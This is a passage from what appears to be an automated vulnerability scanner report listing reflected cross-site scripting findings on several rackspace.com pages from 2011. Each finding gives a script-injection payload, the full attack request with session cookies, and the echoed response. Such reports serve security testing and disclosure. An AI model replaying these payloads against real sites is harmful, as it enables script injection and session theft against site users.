<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/index.php?noflash=true93307"><script>alert(1)</script>52822b1d737&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return false ...[SNIP]...
4.138. http://www.rackspace.com/information/aboutus.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/aboutus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><script>alert(1)</script>ea74ab7f6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... p" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.139. http://www.rackspace.com/information/contactus.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/contactus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3623a"><script>alert(1)</script>6457e4ed9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/contactus.php?3623a"><script>alert(1)</script>6457e4ed9ad=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
4.140. http://www.rackspace.com/information/events/briefingprogram.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/briefingprogram.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31c1"><script>alert(1)</script>3adc45aa57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.141. http://www.rackspace.com/information/events/green.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/green.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03c6"><script>alert(1)</script>892efc84f3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /information/events/green.php?a03c6"><script>alert(1)</script>892efc84f3b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/green/index.php?a03c6"><script>alert(1)</script>892efc84f3b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.142. http://www.rackspace.com/information/events/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad42"><script>alert(1)</script>e58f97036b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/index.php?7ad42"><script>alert(1)</script>e58f97036b2=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:31:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, pos